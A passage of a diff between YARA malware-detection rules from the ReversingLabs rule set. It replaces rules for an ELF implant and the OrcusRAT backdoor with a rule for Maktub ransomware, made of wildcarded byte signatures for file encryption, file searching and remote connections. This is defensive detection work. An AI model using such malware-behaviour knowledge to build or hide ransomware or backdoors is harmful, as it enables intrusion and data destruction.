-            C1 F8 ?? 89 C6 48 63 C6 48 8B BC C5 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 99 C1 EA
-            ?? 01 D0 83 E0 ?? 29 D0 BA ?? ?? ?? ?? 89 C1 48 D3 E2 48 89 D0 48 09 C7 48 89 FA 48
-            63 C6 48 89 94 C5 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 39 85 ?? ?? ??
-            ?? 7D ?? 48 8B 85 ?? ?? ?? ?? 8B 00 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 39
-            85 ?? ?? ?? ?? 7D ?? 48 8B 85 ?? ?? ?? ?? 8B 00 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            8D 78 ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 B9 ?? ?? ?? ?? BA ?? ??
-            ?? ?? 48 89 C6 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
-            ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ??
-            8B 00 8D 50 ?? 85 C0 0F 48 C2 C1 F8 ?? 48 98 48 8B B4 C5 ?? ?? ?? ?? 48 8B 85 ?? ??
-            ?? ?? 8B 00 99 C1 EA ?? 01 D0 83 E0 ?? 29 D0 BA ?? ?? ?? ?? 89 C1 48 D3 E2 48 89 D0
+		$remote_connection_p2 = {
+            74 ?? B8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ??
+            ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 55 ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 48
+            8D 15 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 85 ?? ?? ?? ?? 48 89 C1
+            48 8B 05 ?? ?? ?? ?? FF D0 B9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 45 ?? 48
+            89 C1 E8 ?? ?? ?? ?? 84 C0 74 ?? C6 85 ?? ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1
+            48 8B 05 ?? ?? ?? ?? FF D0 48 8B 85 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0
+            48 8B 85 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 B9 ?? ?? ?? ?? 48 8B 05 ??
+            ?? ?? ?? FF D0 0F B6 85 ?? ?? ?? ?? 83 F0 ?? 84 C0 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            89 C1 BA ?? ?? ?? ?? 89 C8 F7 EA C1 FA ?? 89 C8 C1 F8 ?? 29 C2 89 D0 69 C0 ?? ?? ??
+            ?? 29 C1 89 C8 8D 88 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 45 ?? 41 89 C9 49 89 D0
+            48 8D 15 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 45 ?? 48 C7 44 24 ??
+            ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 49 89 C0 48 8B 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 85 C0 0F 94 C0 84 C0 74 ?? 48 8D 55 ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 48 8D 15
+            ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 85 ?? ?? ?? ?? 48 89 C1 48 8B
+            05 ?? ?? ?? ?? FF D0 B9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 45 ?? 48 89 C1
+            E8 ?? ?? ?? ?? 90 48 81 C4 ?? ?? ?? ?? 5D C3
         }
-		$network_proxy_communication_p2 = {
-            48 21 F0 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 48 8B
-            85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 D1 BA ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 89
-            85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 C7 E8 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? E9 ?? ?? ?? ??
-            48 8B 85 ?? ?? ?? ?? 8B 00 8D 50 ?? 85 C0 0F 48 C2 C1 F8 ?? 48 98 48 8B B4 C5 ?? ??
-            ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 99 C1 EA ?? 01 D0 83 E0 ?? 29 D0 BA ?? ?? ?? ?? 89
-            C1 48 D3 E2 48 89 D0 48 21 F0 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D
-            B5 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 D1 BA ?? ?? ?? ?? 48 89
-            C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? EB
-            ?? 8B 95 ?? ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89
-            C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? EB ?? 90 E9 ?? ?? ?? ?? 48 8B 4D ?? 64 48 33 0C 25 ?? ?? ?? ?? 74 ?? EB ??
-            F3 0F 1E FA 48 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C9 C3
+		$find_files = {
+            48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 83 F8 ?? 0F 95 C0 84 C0 74 ?? BB ??
+            ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8D 95 ?? ?? ??
+            ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C2 48 8B 0D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ??
+            48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ??
+            ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8
+            ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48
+            8D 95 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 10 48 83 EA ?? 48 8B 12
+            48 01 D0 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 0F 95 C0 84 C0 0F 85 ?? ?? ?? ?? 48 8B 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 85 ?? ?? ??
+            ?? 48 89 C1 E8 ?? ?? ?? ?? 83 FB ?? 74 ?? BB ?? ?? ?? ?? EB ?? 90 BB ?? ?? ?? ?? 48
+            8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 FB ?? 74 ?? BB ?? ?? ?? ?? EB ?? 90 BB
+            ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 83 FB ?? 74 ?? E9 ?? ?? ?? ?? 90 E9
+            ?? ?? ?? ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48
+            89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ??
+            ?? 48 89 C1 E8 ?? ?? ?? ?? E9
         }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( all of ( $install_library_implant_p* ) ) and ( $self_delete ) and ( all of ( $execute_local_file_p* ) ) and ( all of ( $network_proxy_communication_p* ) )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Orcusrat : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Maktub : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects OrcusRAT backdoor."
+		description = "Yara rule that detects Maktub ransomware."
 		author = "ReversingLabs"
-		id = "d4700cd1-73a4-552d-bc27-7408508a28e7"
-		date = "2024-09-10"
-		modified = "2024-09-10"
+		id = "23ca4232-77ff-5519-b6b0-ccec6cb35fe1"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/ByteCode.MSIL.Backdoor.OrcusRAT.yara#L1-L134"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Maktub.yara#L1-L116"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "17a85613e9e4c862ce81fee49065c250381dbf8a50cf07d496f5fd2c1b82d92e"
+		logic_hash = "ee3213213e9521f7d19ce6340cd2f98057c22b1188ceefc30c17c18b6ec54e20"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "OrcusRAT"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Maktub"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$get_tcp_connections = {
-            18 0B 16 0C 7E ?? ?? ?? ?? 12 ?? 17 07 1B 16 28 ?? ?? ?? ?? 0D 09 2C ?? 09 1F ?? 2E
-            ?? 72 ?? ?? ?? ?? 09 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 08 28 ?? ?? ??
-            ?? 13 ?? 11 ?? 12 ?? 17 07 1B 16 28 ?? ?? ?? ?? 0D 09 2C ?? 72 ?? ?? ?? ?? 09 8C ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 11 ?? D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? A5 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 8C ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 6A 58 28 ?? ?? ?? ?? 13 ?? 11 ?? 7B ?? ?? ?? ?? 8D ?? ?? ?? ?? 0A
-            16 13 ?? 2B ?? 11 ?? D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? A5 ?? ?? ?? ?? 13
-            ?? 06 11 ?? 11 ?? A4 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 8C ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 6A 58 28 ?? ?? ?? ?? 13 ?? 11 ?? 17 58 13 ?? 11 ?? 6A 11 ?? 7B ?? ?? ?? ?? 6E
-            32 ?? DE ?? 11 ?? 28 ?? ?? ?? ?? DC 06 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? (FE | 06)
-            ?? ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28
+		$encrypt_files = {
+            55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8D 8B ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 51 8D B3 ?? ?? ?? ?? 8B CB 56 E8 ?? ?? ?? ?? 85 C0 74 ?? 50 8B 43 ?? FF D0 8D
+            45 ?? C7 45 ?? ?? ?? ?? ?? 50 8B 43 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
+            B3 ?? ?? ?? ?? FF D0 85 C0 74 ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8B 43 ?? 6A
+            ?? 6A ?? 6A ?? 6A ?? FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF D0 85 C0 75 ?? FF 75 ?? 8B 43
+            ?? FF D0 5E 33 C0 5B 8B E5 5D C3 A1 ?? ?? ?? ?? 57 8B 7D ?? 85 C0 75 ?? FF 15 ?? ??
+            ?? ?? A3 ?? ?? ?? ?? 57 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F8 89 7D ?? 85 C9 74
+            ?? 8B D1 33 C0 C1 E9 ?? F3 AB 8B CA 83 E1 ?? F3 AA 8B 7D ?? B9 ?? ?? ?? ?? 3B FE 76
+            ?? 8D 46 ?? 3B F8 73 ?? 8D 57 ?? 8D 70 ?? 8B FF 8A 06 8D 52 ?? 88 42 ?? 8D 76 ?? 49
+            75 ?? EB ?? 8B D7 2B D6 8A 06 8D 76 ?? 88 44 32 ?? 49 75 ?? E8 ?? ?? ?? ?? 89 83 ??
+            ?? ?? ?? 8D 4F ?? 8B 83 ?? ?? ?? ?? 89 47 ?? FF B3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 45 ?? FF 75 ?? 50 8B 43 ?? 57 6A ?? 6A ?? 6A ?? FF 75 ?? FF D0 85 C0 75 ?? A1
+            ?? ?? ?? ?? 85 C0 75 ?? A1 ?? ?? ?? ?? FF D0 A3 ?? ?? ?? ?? 57 6A ?? 50 FF 15 ?? ??
+            ?? ?? FF 75 ?? 8B 43 ?? FF D0 5F 5E 33 C0 5B 8B E5 5D C3 FF 75 ?? 8D 45 ?? 57 50 E8
+            ?? ?? ?? ?? 50 8D 8B ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? A1 ?? ?? ??
+            ?? 85 C0 75 ?? A1 ?? ?? ?? ?? FF D0 A3 ?? ?? ?? ?? 57 6A ?? 50 FF 15 ?? ?? ?? ?? FF
+            75 ?? 8B 43 ?? FF D0 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3
         }
-		$get_operating_system_information_p1 = {
-            73 ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 0B 12 ?? (FE | 16) ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 0A 28 ?? ?? ?? ?? 0C 08 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 2B ??
-            06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 06 72
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 0D
-            09 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 09 (FE | 06) ??
-            ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 39 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 2F ?? 06 1C 8D ?? ?? ?? ??
-            25 16 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25
-            18 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 25 1A
-            11 ?? 8C ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 38 ??
-            ?? ?? ?? 06 1C 8D ?? ?? ?? ?? 25 16 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F
+		$search_files = {
+            55 8B EC 83 EC ?? 53 56 57 8B F9 68 ?? ?? ?? ?? FF 75 ?? 8B 47 ?? FF D0 85 C0 0F 84
+            ?? ?? ?? ?? 8B 47 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ??
+            FF D0 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 4F ?? 8D 45 ?? 50 0F 57 C0 53 66 0F 13 45
+            ?? FF D1 85 C0 0F 84 ?? ?? ?? ?? 8B 75 ?? 8B C6 0B 45 ?? 0F 84 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 6A ?? 50 8D 4D ?? C7 45 ?? ?? ?? ?? ?? FF
+            72 ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 87 ?? ?? ?? ??
+            8B 55 ?? 8D 4A ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? FF 70 ?? 50 FF 31 8D 4D ?? E8 ?? ??
+            ?? ?? 8B 45 ?? 83 C0 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 7F ?? A1 ?? ?? ?? ?? 85 C0 75 ??
+            FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 75 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 45 ?? 85 C0
+            7C ?? 7F ?? 81 FE ?? ?? ?? ?? 72 ?? 50 8B 45 ?? 56 53 8B 1D ?? ?? ?? ?? 33 F6 51 8D
+            48 ?? 89 65 ?? 39 31 7C ?? 51 8D 70 ?? FF D3 8B 4D ?? 8D 46 ?? 51 33 F6 89 65 ?? 89
+            01 8B 45 ?? 39 70 ?? 8D 48 ?? 7C ?? 51 8D 70 ?? FF D3 8B 4D ?? 8D 46 ?? 89 01 8B CF
+            E8 ?? ?? ?? ?? 8B 75 ?? 8B F8 E9 ?? ?? ?? ?? 8B 75 ?? 8B 47 ?? 6A ?? 6A ?? 6A ?? 6A
+            ?? 6A ?? 68 ?? ?? ?? ?? 56 FF D0 89 45 ?? 83 F8 ?? 75 ?? 8B 47 ?? 53 FF D0 33 FF E9
+            ?? ?? ?? ?? 51 8D 87 ?? ?? ?? ?? 8B CF 50 E8 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ??
+            ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 4D ?? C7 45
+            ?? ?? ?? ?? ?? 51 FF 75 ?? 50 8B 47 ?? 53 FF D0 85 C0 75 ?? 8B 4D ?? E9 ?? ?? ?? ??
+            8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? C7 45 ??
+            ?? ?? ?? ?? 50 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 85 C0 74 ?? E8 ?? ?? ?? ??
+            8B 45 ?? 6A ?? 89 45 ?? 8D 45 ?? 50 8B 47 ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? FF D0
+            85 C0 75 ?? 8B 4D ?? EB ?? FF 75 ?? 8D 45 ?? 50 FF 75 ?? 8B 47 ?? 6A ?? 6A ?? 6A ??
+            FF 75 ?? FF D0 85 C0 75 ?? 8B 4D ?? EB ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF
+            75 ?? 8B 45 ?? 50 FF 75 ?? 8B 47 ?? FF D0 8B 4D ?? 85 C0 74 ?? 8B 45 ?? 3B 45 ?? 74
+            ?? E8 ?? ?? ?? ?? FF 75 ?? 8B 47 ?? FF D0 8B 47 ?? 53 FF D0 FF 75 ?? 8B 47 ?? FF D0
+            8B 47 ?? 56 FF D0 33 FF E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8B 47 ?? FF D0 FF 75
+            ?? 8B 47 ?? FF D0 8B 47 ?? 53 FF D0 51 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ??
+            ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 51 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ??
+            ?? ?? ?? 6A ?? 51 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 51 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 45
+            ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? FF 75 ?? 8B 47 ?? FF D0 85 C0 75 ??
+            8B 47 ?? 56 FF D0 33 FF EB ?? BF ?? ?? ?? ?? 83 C6 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ??
+            85 C0 7F ?? A1 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B 1D ?? ??
+            ?? ?? 56 6A ?? 50 FF D3 EB ?? 8B 47 ?? 53 FF D0 33 FF 8B 1D ?? ?? ?? ?? 8B 75 ?? 83
+            C6 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 7F ?? A1 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ??
+            ?? ?? ?? A3 ?? ?? ?? ?? 56 6A ?? 50 FF D3 8B C7 5F 5E 5B 8B E5 5D C2
         }
-		$get_operating_system_information_p2 = {
-            A2 25 17 72 ?? ?? ?? ?? A2 25 18 11 ?? 8C ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 25
-            1A 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 28 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 06 1A 8D ?? ?? ?? ?? 25 16 09 7B ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 09 7B ?? ?? ?? ?? 72 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26
-            06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 06 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 39 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 13 ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 33 ?? 06 72 ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 38 ?? ?? ?? ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 33 ?? 06 72 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 38 ?? ?? ?? ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 33 ?? 06 6F ?? ?? ?? ?? 72
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 38 ?? ?? ?? ?? 06
-            6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 39 ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 2B ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 33 ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 2B ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 2E ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 33
-            ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 2E ?? 11
-            ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 2E ?? 06 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            2C ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 06 72
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 09 7B ?? ?? ?? ?? 2C ?? 09 7B ?? ?? ?? ?? 6F ?? ??
-            ?? ?? DC 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 73 ?? ?? ?? ?? 13 ?? 11
+		$previous_encrypt_files = {
+            0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8D 4D
+            ?? 89 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF
+            77 ?? FF D3 8D 4D ?? 89 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ??
+            ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6
+            0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0
+            8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D
+            4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ??
+            FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ??
+            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF
+            30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ??
+            ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89
+            B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ??
+            ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6
+            0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0
+            8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D
